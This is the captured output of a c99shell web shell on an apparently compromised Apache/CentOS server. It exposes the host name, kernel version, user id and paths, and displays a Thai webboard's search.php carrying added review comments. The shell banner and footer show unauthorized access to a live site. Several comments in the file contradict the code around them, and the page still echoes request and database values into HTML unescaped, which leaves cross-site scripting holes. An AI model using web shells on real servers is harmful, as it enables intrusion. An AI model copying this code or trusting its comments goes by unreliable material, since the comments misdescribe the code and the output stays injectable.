!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/webboard/   drwxr-xr-x
Free 52.39 GB of 127.8 GB (40.99%)


Viewing file:     search.php (10.29 KB)      -rw-r--r--
<?
// Bootstrap: site configuration and the shared page header are loaded first.
include "config.inc.php";
include "header.php";

// The "user online" fragment is only included when $online is at least 1.
// NOTE(review): $online is not assigned in this file; presumably config.inc.php sets it -- confirm.
if ($online >= 1) {
    include "useronline.php";
}
include "function.php";

// Guard clause: without a Category the page prints an error with a "go back" link and stops.
// NOTE(review): $Category is never assigned in this file; it presumably arrives from the
// request (the search form submits to search.php?Category=...) -- confirm how it is populated.
if (empty($Category)) {
    echo "<center><br>",
         "<font color=red size=+1> กรุณาระบุ Category ให้ตรงกับที่ web เปิดใช้ด้วยครับ</font>",
         "<br><br>",
         "<font color=red size=+1><b>[</b> <a href='javascript:history.back(1)'>กลับไปแก้ไข</a> <b>]</b></font>",
         "</center>";
    exit();
}

// CheckCategory() is defined outside this file (presumably in function.php); its result
// replaces the supplied value and is what the rest of the page interpolates into SQL and
// HTML, so the strength of that check decides how safe those uses are.
$Category = CheckCategory($Category);
?>	

	<html>
	<head>
	<title><?echo $title?></title>
	<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
 <link href="../source/style.css" rel="stylesheet" type="text/css">

	</head>
	<body bgcolor=#FFFFE0 background="pic/bg2.gif" onmouseover="window.status=' <?echo $title?> '; return true";
	onmouseout="window.status=' <?echo $title?> '; return true";>
	<p>  <?

?>

 
  <form method=post action="../webboard/search.php?Category=<? echo $Category; ?>" name="SearchForm" onSubmit="return check()">
	<table width=809 height="37" border=0 align="center">
      <tr>
        
      <td align=center width="44%" height="33"> <div align="center"><br>
          <?
		  // Label first, then whatever nuser.php prints beneath it.
		  print "สมาชิก 3 คนล่าสุด : ";
		  include "nuser.php";
		  // Line break plus the lead-in text, followed by the output of alluser.php.
		  echo "<br>", " มี ";
		  include "alluser.php";
?>
          <?

// bd.php is included for its output only; a "Happy Birth Day to : " label that used to
// precede it is disabled, which suggests the fragment prints a birthday list -- confirm.
include "bd.php";
?>
        </div></td>
	    <td align=center  width="56%" height="33">ค้นหาคำถาม 
          <input type=text name="search" size=25 maxlength=100>
	<input type=submit value="Search"> 
	</td></tr></table>
	</form>
   

  <?
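	include("config.inc.php");

	// NOTE(review): $search, $page and $Category are never assigned in this file; they
	// presumably arrive from the request (register_globals or an extract() in an
	// include) -- confirm. Everything below treats them as untrusted.
	if (!isset($search) || !is_string($search)) {
		// Missing or array-valued input: fall back to an empty search term.
		$search = '';
	}
	if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
		// Undo magic-quote slashes so the term is escaped exactly once, by the
		// context-specific functions below, instead of relying on magic quotes.
		$search = stripslashes($search);
	}
	$search_topic = $search;
	$search = strtolower(trim($search));
	$chk_date = date("j M Y",mktime( date("H")+$p_hour, date("i")+$p_min ));

	// $page feeds arithmetic, the LIMIT clause and several links: force a positive integer
	// so it can carry neither SQL nor markup.
	$page = empty($page) ? 1 : (int)$page;
	if ($page < 1) {
		$page = 1;
	}
	// Integer copy of the configured page size for use inside the SQL text.
	$per_page = (int)$list_page;

	// Connect to the database and work out the total number of pages.
	mysql_connect($host,$user,$passwd);

	// Escape every value that is placed inside a quoted SQL literal. The legacy mysql_*
	// API used by this file has no bound parameters, so per-value escaping on the open
	// connection is the available defence; moving the whole page to prepared statements
	// (mysqli/PDO) is the long-term fix.
	$sql_category = mysql_real_escape_string($Category);
	$sql_term = mysql_real_escape_string($search);

	// The two LIKE tests are parenthesised: without the brackets "A and B or C" is read
	// as "(A and B) or C", so a match on Note returned rows from every category.
	$where = "Category='$sql_category' and (Question like '%$sql_term%' or Note like '%$sql_term%')";

	$sql = "select No from webboard_data where $where";
	$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);
	// Round up so a partially filled last page still counts as a page.
	$totalpage = ceil($NRow/$list_page);
	$goto = ($page-1)*$per_page;

	// The search term is echoed back to the visitor, so it is HTML-escaped first. The page
	// declares charset tis-620, which is single-byte and ASCII-compatible; naming a
	// single-byte charset here leaves the Thai bytes untouched and rewrites only the
	// ASCII metacharacters.
	$search_topic_html = htmlspecialchars($search_topic, ENT_QUOTES, 'ISO-8859-1');

	echo "<font size=3 face='MS Sans Serif'>\n";
	echo "&nbsp;&nbsp;&nbsp;&nbsp;ผลจากการค้นหาคำว่า \" <font color=red><b>$search_topic_html </b></font>\" เจอทั้งหมดจำนวน \" <font color=red><b>$NRow</b> </font>\" คำถาม\n";
	echo "</font><br><br>\n\n";

	// Fetch only the rows for the requested page; both LIMIT operands are integers.
	$sql = "select * from webboard_data where $where order by No DESC limit $goto,$per_page";
	$result = mysql_db_query($dbname,$sql);
	$NRow = mysql_num_rows($result);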

	// Render the result page. When the page query returned no rows the document is
	// closed and the script stops; otherwise the result table, the icon legend and
	// the pager are printed.
	if($NRow==0) { 
		echo "<hr color=1E90FF>\n";
		echo "</center>\n";
		echo "</body>\n";
		echo "</html>\n";
		exit();
	}
	// Display the board's column headings
	else {
	echo "<table width=809 height=36 border=1 bordercolor=black cellspacing=0 cellpadding=2>\n";
		echo "<tr bgcolor= dodgerblue>\n";
		echo "\t<td align=center width=11%><font size=2 color=#FFF8DC><b>คำถามที่</b></font></td>\n";
		echo "\t<td align=center width=47% ><font size=2 color=#FFF8DC><b>คำถาม-[จำนวนคำตอบ] [จำนวนคนเข้าอ่าน]</b></font></td>\n";
		echo "\t<td align=center width=24%><font size=2 color=#FFF8DC><b>ผู้ถาม[วันที่ถาม]</b></font></td>\n";
		echo "\t<td align=center width=18%><font size=2 color=#FFF8DC><b>ผู้ตอบ[วันที่ตอบ]</b></font></td>\n";
		echo "</tr>\n\n";

		// Loop over the rows that were read and display each one
		while ($row = mysql_fetch_array($result)) {
			
			// Pick the row colour so that consecutive rows alternate
			//$bgc = ($bgc=="lightcyan") ? "powderblue" : "lightcyan";

			// NOTE(review): $bgc, $rowColor1 and $rowColor2 are not assigned in this
			// file; presumably the colours come from config.inc.php -- confirm.
			$bgc = ($bgc==$rowColor1) ? $rowColor2 : $rowColor1; 

			// Copy the row's columns into local variables
			// NOTE(review): the text columns below (Question, Name, Namer) are echoed
			// into the HTML further down without htmlspecialchars(); unless they are
			// escaped when stored -- confirm -- this is a stored-XSS sink.
			$No = sprintf("%05d",$row["No"]);
			$Question = $row["Question"];
			$Name = $row["Name"];
			$Namer = $row["Namer"];
			$Member = $row["Member"];
			$Memberr = $row["Memberr"];
			$nphoto = $row["nphoto"];
			$Date = trim(substr($row["Date"],-19,-9)); // keep only the date part
			$Reply = $row["Reply"];
			$ReplyDate = trim(substr($row["ReplyDate"],-19,-9)); 
			$pageviewdata = $row["pageview"];
			// keep only the date part
			// Rows whose date equals $chk_date get the highlight colour instead of
			// the alternating one.
			if($Date==$chk_date) {
				echo "<tr bgcolor=$rowHiLight>\n";
					
				}else {
			echo "<tr bgcolor=$bgc>\n";			
				}
			// Show the folder icon
			// First matching test wins: reply count >= 10 (hot), has a reply date (open),
			// dated $chk_date (new), otherwise the closed-folder icon.
			
					////new
			     
               if($Reply>="10" )
				    
				{
			    echo "\t<td align=center><img src='../webboard/pic/hotfd.gif'> $No</td>\n";
		       }
			 elseif($ReplyDate!="") 
			         
			           {
				    echo "\t<td align=center><img src='../webboard/pic/openfd.gif'> $No</td>\n";
				      } 
             elseif($Date==$chk_date) 
				{
				echo "\t<td  align=center><img src='../webboard/pic/newfd.gif'> $No</td>\n";
				      } 
					  
				     else {
				    echo "\t<td align=center><img src='../webboard/pic/closefd.gif'> $No</td>\n";
				           }


			// Question cell: the same link to show.php in every branch; the branches
			// differ only in which badges follow it (camera when $nphoto is non-empty,
			// new2day when $Date equals $chk_date, update2day when $ReplyDate equals
			// $chk_date). The chain is ordered from the most specific combination down.
			if(($ReplyDate==$chk_date)&&($nphoto!='')&&($Date==$chk_date))			{
			echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
			}
			elseif(($ReplyDate==$chk_date)&&($nphoto!=''))			{
			echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <img src='../webboard/pic/cam.gif' border=\"0\"><font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
			}
			elseif(($ReplyDate==$chk_date) &&($Date==$chk_date))
				{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
				      } 
			elseif($ReplyDate==$chk_date)
				{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a> <font color=red size='2'> <img src='../webboard/pic/update2day.gif' border=\"0\"></font>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
				      } 
					  elseif(($nphoto!='') &&($Date==$chk_date))
				{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a><img src='../webboard/pic/new2day.gif' border=\"0\"> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
				
				      } 
					
					  elseif($nphoto!='') 
				{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/cam.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
				
				      } 
					
					   elseif($Date==$chk_date) 
				{echo "\t<td ><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question </a> <img src='../webboard/pic/new2day.gif' border=\"0\">&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
				
				      } 
			

			else{
				echo "\t<td><a href='show.php?Category=$Category&No=$row[No]' target='$No'>$Question</a>&nbsp;[<font color=red> $Reply </font>] [<font color=red> $pageviewdata </font>]</td>\n";
			         }			

			// Asker cell: a truthy $Member adds the online.gif badge after the name.
			if($Member) {
				echo "\t<td>$Name <img src='../webboard/pic/online.gif'> <font color=blue> [$Date]</font></td>\n";
			}
			else {
				echo "\t<td>$Name <font color=blue> [$Date] </font></td>\n";
			}
			
			// Check whether anyone has answered the question yet
			// Both branches print the same cell and close the row; a truthy $Memberr
			// only adds the online.gif badge next to the replier's name.
if($Memberr) {
			if($ReplyDate!="" ) 
				{
				echo "\t<td>$Namer <img src='../webboard/pic/online.gif'> <font color=blue>[$ReplyDate]</font></td>\n";
			    }
			else 
				{
				echo "\t<td> ยังไม่มีคนตอบ </td>\n";
			    }
			echo "</tr>\n\n";
			
		}else{
		if($ReplyDate!="" ) 
				{
				echo "\t<td> $Namer <font color=blue>[$ReplyDate]</font></td>\n";
			    }
			else 
				{
				echo "\t<td> ยังไม่มีคนตอบ </td>\n";
			    }
			echo "</tr>\n\n";
		}
		
		}
		
		echo "</table>\n\n";
		
		
		
		// Table explaining what each icon means
		echo "<table width=809 height=36 border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
		echo "<tr><td align=left>\n";
		echo "\t<img src='../webboard/pic/newfd.gif'> - คำถามใหม่ \n";
		echo "\t<img src='../webboard/pic/closefd.gif'> - คำถามเก่า \n";
		echo "\t<img src='../webboard/pic/openfd.gif'> - คำถามที่ถูกตอบแล้ว\n";
		echo "\t<img src='../webboard/pic/hotfd.gif'> - คำถามที่มีคนตอบมาก\n";
		echo "\t<img src='../webboard/pic/cam.gif'> - คำถามที่มีรูป\n";
		echo "\t<img src='../webboard/pic/online.gif'> - สมาชิกเว็บบอร์ด\n";
		echo "</td></tr>\n";
		echo "</table>\n\n";

		// Table showing the page numbers
		// NOTE(review): $page is interpolated into the markup and links below exactly
		// as it was left by the earlier code; it has to be an integer by this point or
		// these echoes are an injection sink -- confirm where it is validated.
		// NOTE(review): every pager link targets webboard.php and carries only Category
		// and page, so the search term is not kept when paging -- confirm this is intended.
		echo "<table width=809 height=36  border=0 bordercolor=black cellspacing=0 cellpadding=2>\n";
		echo "<tr><td align=left>\n";
		echo "\t<font size=2 color=#9400D3>\n";

		// Build the links to the previous and next page
		if($page>1 && $page<=$totalpage) {
			$prevpage = $page-1;
			echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$prevpage'>[หน้าก่อน = $prevpage]</a>\n";
		}

		echo "\t กำลังแสดงหน้าที่ $page/$totalpage \n";

		// This test is also true when $page is greater than $totalpage, so a "next"
		// link is printed in that case as well.
		if($page!=$totalpage) {
			$nextpage = $page+1;
			echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$nextpage'>[หน้าถัดไป = $nextpage]</a>\n";
		}

		echo "\t</font>\n";
		echo "</td></tr>\n";
		echo "<tr><td>\n";

		// Loop to print every page number: links before the current page, the current
		// page in bold red, then links for the pages after it
		for($i=1 ; $i<$page ; $i++) {
			echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";
		}
		echo "\t<font size=2 color=red><b>$page</b></font> \n";
		for($i=$page+1 ; $i<=$totalpage ; $i++) {
			echo "\t<a href='../webboard/webboard.php?Category=$Category&page=$i'>$i</a> \n";
		}
	
		echo "</td></tr>\n";
		echo "</table>\n";
	}
?>
 
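<font size=2 face="MS Sans Serif"> [ <a href="../webboard/postq.php?Category=<? echo $Category; ?>&page=<? /* $page is only checked with empty() in this file, so it is emitted as an integer here to keep it from breaking out of the href attribute */ echo (int)$page; ?>">ตั้งคำถามใหม่</a> 
] </font> 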
<hr width="809" color=1E90FF>
<font size=1 face="MS Sans Serif"> </font> </body> </html>


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0063 ]--